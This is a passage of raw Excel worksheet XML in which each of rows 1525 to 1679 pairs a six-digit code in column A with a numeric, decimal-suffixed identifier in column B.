      <c r="A1525" s="5">
        <v>500077</v>
      </c>
      <c r="B1525" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="1526" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1526" s="5">
        <v>500077</v>
      </c>
      <c r="B1526" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="1527" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1527" s="5">
        <v>500077</v>
      </c>
      <c r="B1527" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1528" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1528" s="5">
        <v>500077</v>
      </c>
      <c r="B1528" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="1529" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1529" s="5">
        <v>500077</v>
      </c>
      <c r="B1529" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1530" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1530" s="5">
        <v>500077</v>
      </c>
      <c r="B1530" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1531" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1531" s="5">
        <v>500077</v>
      </c>
      <c r="B1531" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="1532" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1532" s="5">
        <v>500077</v>
      </c>
      <c r="B1532" s="3">
        <v>901003.005</v>
      </c>
    </row>
    <row r="1533" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1533" s="5">
        <v>500077</v>
      </c>
      <c r="B1533" s="3">
        <v>901055.01300000004</v>
      </c>
    </row>
    <row r="1534" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1534" s="5">
        <v>500077</v>
      </c>
      <c r="B1534" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1535" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1535" s="5">
        <v>500077</v>
      </c>
      <c r="B1535" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="1536" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1536" s="5">
        <v>500065</v>
      </c>
      <c r="B1536" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1537" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1537" s="5">
        <v>500065</v>
      </c>
      <c r="B1537" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1538" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1538" s="5">
        <v>500065</v>
      </c>
      <c r="B1538" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="1539" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1539" s="5">
        <v>500065</v>
      </c>
      <c r="B1539" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1540" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1540" s="5">
        <v>500065</v>
      </c>
      <c r="B1540" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="1541" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1541" s="5">
        <v>500065</v>
      </c>
      <c r="B1541" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1542" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1542" s="5">
        <v>500065</v>
      </c>
      <c r="B1542" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1543" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1543" s="5">
        <v>500065</v>
      </c>
      <c r="B1543" s="3">
        <v>901586.00100000005</v>
      </c>
    </row>
    <row r="1544" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1544" s="5">
        <v>500065</v>
      </c>
      <c r="B1544" s="3">
        <v>901586.00199999998</v>
      </c>
    </row>
    <row r="1545" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1545" s="5">
        <v>500065</v>
      </c>
      <c r="B1545" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1546" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1546" s="5">
        <v>500065</v>
      </c>
      <c r="B1546" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="1547" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1547" s="5">
        <v>500065</v>
      </c>
      <c r="B1547" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1548" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1548" s="5">
        <v>500065</v>
      </c>
      <c r="B1548" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="1549" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1549" s="5">
        <v>500065</v>
      </c>
      <c r="B1549" s="3">
        <v>901585.00100000005</v>
      </c>
    </row>
    <row r="1550" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1550" s="5">
        <v>500065</v>
      </c>
      <c r="B1550" s="3">
        <v>901585.00199999998</v>
      </c>
    </row>
    <row r="1551" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1551" s="5">
        <v>500065</v>
      </c>
      <c r="B1551" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="1552" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1552" s="5">
        <v>500065</v>
      </c>
      <c r="B1552" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1553" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1553" s="5">
        <v>500065</v>
      </c>
      <c r="B1553" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="1554" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1554" s="5">
        <v>500065</v>
      </c>
      <c r="B1554" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1555" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1555" s="5">
        <v>500065</v>
      </c>
      <c r="B1555" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1556" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1556" s="5">
        <v>500065</v>
      </c>
      <c r="B1556" s="3">
        <v>901589.00100000005</v>
      </c>
    </row>
    <row r="1557" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1557" s="5">
        <v>500065</v>
      </c>
      <c r="B1557" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1558" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1558" s="5">
        <v>500065</v>
      </c>
      <c r="B1558" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="1559" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1559" s="5">
        <v>500065</v>
      </c>
      <c r="B1559" s="3">
        <v>901534</v>
      </c>
    </row>
    <row r="1560" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1560" s="5">
        <v>500065</v>
      </c>
      <c r="B1560" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1561" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1561" s="5">
        <v>500065</v>
      </c>
      <c r="B1561" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="1562" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1562" s="5">
        <v>500065</v>
      </c>
      <c r="B1562" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="1563" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1563" s="5">
        <v>500065</v>
      </c>
      <c r="B1563" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="1564" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1564" s="5">
        <v>500065</v>
      </c>
      <c r="B1564" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1565" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1565" s="5">
        <v>500065</v>
      </c>
      <c r="B1565" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1566" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1566" s="5">
        <v>500065</v>
      </c>
      <c r="B1566" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1567" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1567" s="5">
        <v>500065</v>
      </c>
      <c r="B1567" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="1568" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1568" s="5">
        <v>500065</v>
      </c>
      <c r="B1568" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="1569" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1569" s="5">
        <v>500065</v>
      </c>
      <c r="B1569" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="1570" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1570" s="5">
        <v>500065</v>
      </c>
      <c r="B1570" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1571" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1571" s="5">
        <v>500065</v>
      </c>
      <c r="B1571" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="1572" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1572" s="5">
        <v>500065</v>
      </c>
      <c r="B1572" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1573" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1573" s="5">
        <v>500065</v>
      </c>
      <c r="B1573" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="1574" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1574" s="5">
        <v>500065</v>
      </c>
      <c r="B1574" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1575" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1575" s="5">
        <v>500065</v>
      </c>
      <c r="B1575" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1576" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1576" s="5">
        <v>500065</v>
      </c>
      <c r="B1576" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1577" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1577" s="5">
        <v>500065</v>
      </c>
      <c r="B1577" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1578" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1578" s="5">
        <v>500065</v>
      </c>
      <c r="B1578" s="3">
        <v>901102.00300000003</v>
      </c>
    </row>
    <row r="1579" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1579" s="5">
        <v>500065</v>
      </c>
      <c r="B1579" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1580" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1580" s="5">
        <v>500095</v>
      </c>
      <c r="B1580" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1581" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1581" s="5">
        <v>500095</v>
      </c>
      <c r="B1581" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1582" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1582" s="5">
        <v>500095</v>
      </c>
      <c r="B1582" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="1583" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1583" s="5">
        <v>500095</v>
      </c>
      <c r="B1583" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="1584" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1584" s="5">
        <v>500095</v>
      </c>
      <c r="B1584" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1585" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1585" s="5">
        <v>500095</v>
      </c>
      <c r="B1585" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1586" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1586" s="5">
        <v>500095</v>
      </c>
      <c r="B1586" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1587" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1587" s="5">
        <v>500095</v>
      </c>
      <c r="B1587" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1588" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1588" s="5">
        <v>500095</v>
      </c>
      <c r="B1588" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="1589" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1589" s="5">
        <v>500095</v>
      </c>
      <c r="B1589" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1590" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1590" s="5">
        <v>500095</v>
      </c>
      <c r="B1590" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1591" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1591" s="5">
        <v>500059</v>
      </c>
      <c r="B1591" s="3">
        <v>901098.00199999998</v>
      </c>
    </row>
    <row r="1592" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1592" s="5">
        <v>500059</v>
      </c>
      <c r="B1592" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1593" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1593" s="5">
        <v>500059</v>
      </c>
      <c r="B1593" s="3">
        <v>901071</v>
      </c>
    </row>
    <row r="1594" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1594" s="5">
        <v>500059</v>
      </c>
      <c r="B1594" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1595" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1595" s="5">
        <v>500059</v>
      </c>
      <c r="B1595" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1596" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1596" s="5">
        <v>500059</v>
      </c>
      <c r="B1596" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1597" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1597" s="5">
        <v>500059</v>
      </c>
      <c r="B1597" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1598" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1598" s="5">
        <v>500059</v>
      </c>
      <c r="B1598" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1599" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1599" s="5">
        <v>500059</v>
      </c>
      <c r="B1599" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1600" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1600" s="5">
        <v>500059</v>
      </c>
      <c r="B1600" s="3">
        <v>901586.00199999998</v>
      </c>
    </row>
    <row r="1601" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1601" s="5">
        <v>500059</v>
      </c>
      <c r="B1601" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="1602" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1602" s="5">
        <v>500059</v>
      </c>
      <c r="B1602" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="1603" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1603" s="5">
        <v>500059</v>
      </c>
      <c r="B1603" s="3">
        <v>901114.00100000005</v>
      </c>
    </row>
    <row r="1604" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1604" s="5">
        <v>500059</v>
      </c>
      <c r="B1604" s="3">
        <v>901585.00100000005</v>
      </c>
    </row>
    <row r="1605" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1605" s="5">
        <v>500059</v>
      </c>
      <c r="B1605" s="3">
        <v>901585.00199999998</v>
      </c>
    </row>
    <row r="1606" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1606" s="5">
        <v>500059</v>
      </c>
      <c r="B1606" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1607" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1607" s="5">
        <v>500059</v>
      </c>
      <c r="B1607" s="3">
        <v>901589</v>
      </c>
    </row>
    <row r="1608" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1608" s="5">
        <v>500059</v>
      </c>
      <c r="B1608" s="3">
        <v>901589.00100000005</v>
      </c>
    </row>
    <row r="1609" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1609" s="5">
        <v>500059</v>
      </c>
      <c r="B1609" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="1610" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1610" s="5">
        <v>500059</v>
      </c>
      <c r="B1610" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="1611" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1611" s="5">
        <v>500059</v>
      </c>
      <c r="B1611" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1612" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1612" s="5">
        <v>500059</v>
      </c>
      <c r="B1612" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1613" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1613" s="5">
        <v>500059</v>
      </c>
      <c r="B1613" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1614" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1614" s="5">
        <v>500059</v>
      </c>
      <c r="B1614" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="1615" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1615" s="5">
        <v>500059</v>
      </c>
      <c r="B1615" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1616" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1616" s="5">
        <v>500059</v>
      </c>
      <c r="B1616" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1617" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1617" s="5">
        <v>500059</v>
      </c>
      <c r="B1617" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1618" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1618" s="5">
        <v>500059</v>
      </c>
      <c r="B1618" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1619" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1619" s="5">
        <v>500059</v>
      </c>
      <c r="B1619" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="1620" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1620" s="5">
        <v>500059</v>
      </c>
      <c r="B1620" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="1621" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1621" s="5">
        <v>500059</v>
      </c>
      <c r="B1621" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1622" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1622" s="5">
        <v>500059</v>
      </c>
      <c r="B1622" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1623" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1623" s="5">
        <v>500059</v>
      </c>
      <c r="B1623" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1624" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1624" s="5">
        <v>500059</v>
      </c>
      <c r="B1624" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1625" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1625" s="5">
        <v>500059</v>
      </c>
      <c r="B1625" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1626" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1626" s="5">
        <v>500059</v>
      </c>
      <c r="B1626" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1627" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1627" s="5">
        <v>500059</v>
      </c>
      <c r="B1627" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1628" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1628" s="5">
        <v>500059</v>
      </c>
      <c r="B1628" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="1629" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1629" s="5">
        <v>500045</v>
      </c>
      <c r="B1629" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1630" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1630" s="5">
        <v>500045</v>
      </c>
      <c r="B1630" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1631" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1631" s="5">
        <v>500045</v>
      </c>
      <c r="B1631" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1632" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1632" s="5">
        <v>500045</v>
      </c>
      <c r="B1632" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1633" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1633" s="5">
        <v>500045</v>
      </c>
      <c r="B1633" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1634" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1634" s="5">
        <v>500045</v>
      </c>
      <c r="B1634" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1635" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1635" s="5">
        <v>500045</v>
      </c>
      <c r="B1635" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1636" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1636" s="5">
        <v>500045</v>
      </c>
      <c r="B1636" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1637" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1637" s="5">
        <v>500045</v>
      </c>
      <c r="B1637" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="1638" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1638" s="5">
        <v>500045</v>
      </c>
      <c r="B1638" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1639" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1639" s="5">
        <v>500045</v>
      </c>
      <c r="B1639" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="1640" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1640" s="5">
        <v>500045</v>
      </c>
      <c r="B1640" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1641" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1641" s="5">
        <v>500045</v>
      </c>
      <c r="B1641" s="3">
        <v>901568.00100000005</v>
      </c>
    </row>
    <row r="1642" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1642" s="5">
        <v>500045</v>
      </c>
      <c r="B1642" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="1643" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1643" s="5">
        <v>500045</v>
      </c>
      <c r="B1643" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="1644" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1644" s="5">
        <v>500045</v>
      </c>
      <c r="B1644" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1645" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1645" s="5">
        <v>500045</v>
      </c>
      <c r="B1645" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="1646" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1646" s="5">
        <v>500045</v>
      </c>
      <c r="B1646" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="1647" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1647" s="5">
        <v>500045</v>
      </c>
      <c r="B1647" s="3">
        <v>901070.00300000003</v>
      </c>
    </row>
    <row r="1648" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1648" s="5">
        <v>500045</v>
      </c>
      <c r="B1648" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1649" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1649" s="5">
        <v>500045</v>
      </c>
      <c r="B1649" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1650" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1650" s="5">
        <v>500045</v>
      </c>
      <c r="B1650" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1651" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1651" s="5">
        <v>500045</v>
      </c>
      <c r="B1651" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1652" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1652" s="5">
        <v>500045</v>
      </c>
      <c r="B1652" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="1653" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1653" s="5">
        <v>500045</v>
      </c>
      <c r="B1653" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1654" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1654" s="5">
        <v>500045</v>
      </c>
      <c r="B1654" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="1655" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1655" s="5">
        <v>500045</v>
      </c>
      <c r="B1655" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="1656" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1656" s="5">
        <v>500045</v>
      </c>
      <c r="B1656" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1657" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1657" s="5">
        <v>500045</v>
      </c>
      <c r="B1657" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1658" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1658" s="5">
        <v>500045</v>
      </c>
      <c r="B1658" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="1659" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1659" s="5">
        <v>500045</v>
      </c>
      <c r="B1659" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="1660" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1660" s="5">
        <v>500045</v>
      </c>
      <c r="B1660" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="1661" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1661" s="5">
        <v>500045</v>
      </c>
      <c r="B1661" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1662" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1662" s="5">
        <v>500045</v>
      </c>
      <c r="B1662" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="1663" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1663" s="5">
        <v>500045</v>
      </c>
      <c r="B1663" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="1664" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1664" s="5">
        <v>500045</v>
      </c>
      <c r="B1664" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1665" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1665" s="5">
        <v>500045</v>
      </c>
      <c r="B1665" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="1666" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1666" s="5">
        <v>500045</v>
      </c>
      <c r="B1666" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1667" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1667" s="5">
        <v>500045</v>
      </c>
      <c r="B1667" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1668" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1668" s="5">
        <v>500045</v>
      </c>
      <c r="B1668" s="3">
        <v>901218.00399999996</v>
      </c>
    </row>
    <row r="1669" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1669" s="5">
        <v>500045</v>
      </c>
      <c r="B1669" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1670" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1670" s="5">
        <v>500045</v>
      </c>
      <c r="B1670" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1671" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1671" s="5">
        <v>500045</v>
      </c>
      <c r="B1671" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1672" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1672" s="5">
        <v>500045</v>
      </c>
      <c r="B1672" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="1673" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1673" s="5">
        <v>500045</v>
      </c>
      <c r="B1673" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1674" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1674" s="5">
        <v>500045</v>
      </c>
      <c r="B1674" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1675" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1675" s="5">
        <v>500045</v>
      </c>
      <c r="B1675" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1676" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1676" s="5">
        <v>500002</v>
      </c>
      <c r="B1676" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="1677" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1677" s="5">
        <v>500103</v>
      </c>
      <c r="B1677" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1678" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1678" s="5">
        <v>500103</v>
      </c>
      <c r="B1678" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1679" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1679" s="5">
        <v>500103</v>
      </c>
